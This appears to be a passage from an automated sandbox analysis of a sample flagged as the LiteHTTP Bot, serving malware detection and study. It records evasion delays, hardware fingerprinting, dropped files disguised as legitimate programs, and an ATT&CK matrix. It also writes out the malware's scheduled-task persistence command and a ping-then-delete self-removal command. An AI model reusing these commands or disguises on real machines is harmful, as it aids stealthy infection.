                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -38502s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -38377s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exe TID: 1020Thread sleep time: -38252s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\random.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\random.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39830Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39705Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39580Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39455Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39330Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39205Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39080Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38955Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38829Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38705Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38580Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38455Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38330Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38165Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37911Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37798Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37673Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37549Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37423Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37298Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37173Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37048Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36923Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36798Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36673Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36548Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36423Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36298Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36173Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36048Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35923Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35799Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35673Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35548Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35376Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35252Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35080Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34935Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34830Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34705Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34580Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34455Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34330Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34205Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34080Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33955Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33830Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33705Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33580Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33455Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33330Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33205Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39830Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39705Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39580Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39455Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39330Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39205Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39080Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38955Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38814Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38689Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38564Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38439Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38314Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38189Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38064Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37939Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37802Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37674Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37549Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37424Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37299Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37174Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37049Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36924Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36799Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36674Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36549Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36424Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36299Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36174Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35297Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35174Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35049Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34924Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34799Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34674Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34548Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34424Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34299Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34174Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34049Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33924Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33799Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33674Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33549Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33424Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33299Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 32406Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 32298Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 32174Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39830Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39689Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39340Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39196Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39066Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38939Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38814Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38689Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38564Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38439Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38314Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38189Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38064Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37939Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37814Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37689Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37564Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37439Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37314Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37189Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 37064Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36939Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36814Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36689Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36568Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36439Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36314Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36189Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 36064Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35939Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35814Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35689Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35564Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35439Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35314Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35189Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 35064Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34939Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34814Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34689Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34564Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34439Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34314Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34189Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 34064Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33939Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33814Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33657Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33544Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33435Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 33324Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39830Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39703Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39578Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39469Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39346Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39221Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 39096Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38920Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38721Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38451Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38345Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38221Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeThread delayed: delay time: 38096Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeThread delayed: delay time: 39830Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeThread delayed: delay time: 39690Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeThread delayed: delay time: 39565Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeThread delayed: delay time: 39449Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeThread delayed: delay time: 39323Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeThread delayed: delay time: 39098Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeThread delayed: delay time: 38979Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeThread delayed: delay time: 38860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeThread delayed: delay time: 38608Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeThread delayed: delay time: 38502Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeThread delayed: delay time: 38377Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeThread delayed: delay time: 38252Jump to behavior
                    Source: random.exe, 00000001.00000002.2010343903.0000000006934000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\random.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\random.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /SC ONLOGON /TN "TaskHelper" /TR "C:\Users\user\Desktop\random.exe" /FJump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess created: C:\Users\user\AppData\Roaming\cEp3d38.exe "C:\Users\user\AppData\Roaming\cEp3d38.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "C:\Users\user\Desktop\random.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 4000Jump to behavior
                    Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\Users\user\Desktop\random.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\Users\user\Desktop\random.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\Users\user\Desktop\random.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\Users\user\Desktop\random.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cEp3d38.exeQueries volume information: C:\Users\user\AppData\Roaming\cEp3d38.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\random.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected LiteHTTP Bot
                    Source: Yara matchFile source: random.exe, type: SAMPLE
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: 1.0.random.exe.cf0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2010343903.00000000069B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.1340004308.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: random.exe PID: 1380, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\OneDrive\jdownloader.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows multimedia platform.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\autoit3.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windowspowershell.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\reference assemblies.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\common files.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows mail.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\microsoft.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows defender.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows sidebar.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows photo viewer.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\msecache.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\java.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\internet explorer.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\mozilla maintenance service.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows nt.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\random.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\microsoft.net.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows media player.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\google.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\microsoft office.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows portable devices.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\msbuild.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\cEp3d38.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Yara detected LiteHTTP Bot
                    Source: Yara matchFile source: random.exe, type: SAMPLE
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: 1.0.random.exe.cf0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2010343903.00000000069B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.1340004308.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: random.exe PID: 1380, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\OneDrive\jdownloader.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows multimedia platform.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\autoit3.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windowspowershell.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\reference assemblies.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\common files.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows mail.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\microsoft.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows defender.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows sidebar.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows photo viewer.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\msecache.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\java.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\internet explorer.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\mozilla maintenance service.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows nt.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\random.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\microsoft.net.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows media player.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\google.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\microsoft office.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\windows portable devices.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\OneDrive\msbuild.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\cEp3d38.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		11
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping211
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		21
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		1
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    DLL Side-Loading                    		21
                    Registry Run Keys / Startup Folder                    		141
                    Virtualization/Sandbox Evasion                    		Security Account Manager141
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading                    		11
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture4
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information                    		LSA Secrets1
                    Remote System Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    System Network Configuration Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    File Deletion                    		DCSync1
                    File and Directory Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem123
                    System Information Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
